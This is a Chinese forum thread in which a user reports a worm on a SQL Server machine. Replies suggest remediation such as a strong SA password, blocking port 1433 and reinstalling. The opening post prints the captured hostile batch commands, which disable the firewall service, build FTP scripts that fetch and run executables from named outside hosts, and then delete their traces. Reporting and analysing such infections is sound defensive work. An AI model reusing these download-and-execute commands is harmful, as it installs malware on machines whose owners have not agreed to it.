最近老是发现自动增加很多cmd进程,只要一装SQL server就100%中毒,它们也不增加系统资源,但是杀死这个进程后不久又会自动添加上来。通过跟踪和观察发现这些cmd进程sqlserver进程生成的。这些cmd进程执行如下两个批处理代码
第一个:
"C:\WINDOWS\system32\cmd.exe" /c net1 stop sharedaccess
&echo open 61.160.212.45>dboy.sys
&echo wunai>>dboy.sys
&echo wunai$>>dboy.sys
&echo get ver.exe C:\boots.exe>>dboy.sys
&echo bye>>dboy.sys
&echo ftp -s:dboy.sys>dboy.bat
&echo copy C:\boots.exeC:\WINDOWS\system32\inf\test.exe
&echo start start /high "" C:\WINDOWS\system32\inf\test.exe
&echo start C:\boots.exe>>dboy.bat
&echo start C:\boots.exe>>dboy.bat
&echo del dboy.sys>>dboy.bat
&echo del %0>>dboy.bat&dboy.bat
第二个
"C:\WINDOWS\system32\cmd.exe" /c sc stop sharedaccess
&echo open ddosboy1.3322.org >dboy1.sys
&echo dboy>>dboy1.sys
&echo if>>dboy1.sys
&echo get dboy1.exe C:\Windows\tcpsrv1.exe>>dboy1.sys
&echo bye>>dboy1.sys&echo ftp -s:dboy1.sys>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo del dboy1.sys>>system1.bat&echo del %0>>system1.bat
&system1.bat这很明显是病毒通过cmd批处理调用dboy.sys。
经查系统system32下有dboy.sys和dboy1.sys,另外还有一个dboy.bat
这两个文件的代码如下
第一个:
open 218.61.11.180
12369
14789
get wm.exe C:\boots.exe
bye
第二个:
open ddosboy1.3322.org 
dboy
if
get dboy1.exe C:\Windows\tcpsrv1.exe
bye
第三个bat文件
ftp -s:dboy.sys
start C:\boots.exe
start C:\boots.exe
del dboy.sys
del %0然后c盘根目录拷贝boots.exe到c:\WINDOWS\system32\inf\test.exe
然后运行这个test.exe文件在上面代码中提到的这些文件test.exe、boots.exe、tcpsrv1.exe、system1.bat都没有发现。
我分析可能是病毒在copy过程中被杀毒软件阻止,然后上述这些文件就没有生成,但是执行copy任务的批处理cmd却滞留在了进程中。
所以我可以在进程中发现他们的踪迹。不知大家有没有中过类似的病毒,是我下载的SQLSERVER2000本身就有病毒还是其它原因
但是如何把这些讨厌的病毒赶尽杀绝呢?sqlserver肯定是不能删除的,那样工程就搞大了。不知道哪位大侠有什么其他高招呢?谢谢先咯。

解决方案 »

  1. 检查一下Microsoft SQL Server 目录下的所有 exe 和 dll 文件,看有哪个文件的创建日期是你发现不对劲时附近时间的.如果你用的是SQL SERVER 2000,那这些文件应该是2000年左右的(如果打过补丁,则可以在打补丁时看创建日期.如果是很新的日期,那应该就是病毒修改了可执行文件.如果这些日期没什么问题,那你对病毒运行的判断可能会不正确.
    一般说来,下载来的SQL SERVER安装文件中不会有病毒,如有,可能是安装后你没打上补丁而被黑了一下,否则不会出现你说的这种情况.
      

  2. 如果可执行文件有问题,可以考虑把SQL SERVER卸载掉,并把目录全删除了再重装.
      

  3.   楼主可以用以下方法试一下:
    1、可以使用360安全卫士或者是其它的杀木马的软件,检测一下电脑中,全盘扫描一下,看你贴出来的病毒代码好像是木马之类的
    2、卸载现在的Sql Server,删除所有的下载的文件,重新下载一个Sql,下载的时候注意看一下评论
    3、安装好Sql之后,一定要打上SP4的补丁
    4、检查一下电脑上有没有防火墙,如果没有的话最好是安装一个,防火墙对于防范一些病毒的攻击还是有用的。
      

  4. 我的也和你一样的问题,   在C盘搜索*.BAT     会发先 C:\WINDOWS\system32\ 下有几个
    异常的bat  打开发现调用了你所说的文件...  然后在搜索bat里指向的文件   删除,  删除完后再删除bat   删除之前要先把cmd进程结束掉\
      我的现在开机没cmd 进程了
      

  5. 楼主,和你发现一样的问题,
    一直找不到原因,重做了几次系统,火大。
    没办法找了个纯净的系统安装盘,每个要装的软件都测试,发现是SQL的问题。
    我装完SQL server2000没打SP4补丁观察了一阵子发现没有问题。
    决定打SP4,重新运行,打开查询分析器,就发现c:/windows/system32底下多了
    system1.bat,dboy.sys,dboy1.sys,dboy.bat几个文件,里面内容基本和你一样。
    但是拿nod32和360都查不出它的安装包有木马。可能打包到SP4安装文件了,
    明天从官网下个SP4补丁试试。
    不知道你是不是也是这样的问题。
      

  6. 还从来没听说过有这种事情.格式化机器,重装系统,重装SQL,不连网络,我就不信还有这问题.
      

  7. 我也碰到同样的问题,简直和楼主说得一模一样,我用的是SQL 2005,没有找补丁.
      

  8. 我现在碰到一样的问题郁闷啊c盘老是自动生成  boots.exe
    用卡巴+360 无论如何都没有整死?求高手想想办法啊~~
      

  9. SQL的默认端口是1433,病毒可能是利用该端口侵入你的计算机,建议更改SQL的默认端口,或设置防火墙拒绝远程访问1433端口
      

  10. 1)、先把SQL Server卸载(卸载不掉也没有关系,继续下面的操作); 
    2)、把Microsoft SQL Server文件夹整个删掉; 
    3)、运行注册表,删除如下项: 
        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server 
        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer 
        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSSQLSERVER 
        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SQLSERVERAGENT 
        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSSQLSERVERADHELPER 
        HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server 
    4)、需要的话就重新启动系统; 
    5)、重新安装。
      

  11.     我前几天也碰到楼主一样的问题,现已解决。主要是因为安装sql server时设置的SA口令为弱口令,而自己的机器没有通过路由器或防火墙与互联网隔离,网络上有些病毒软件利用SA弱口令对机器进行攻击,因此只要将SA的口令设得复杂一些就可避免这种情况。
      

  12. ebtong 说得对.SQL设置密码就没事了.
      

  13. 我也是这个问题,我把sql2000 换成了sql2005,还有这个问题.
      

aliyun

类似问题 »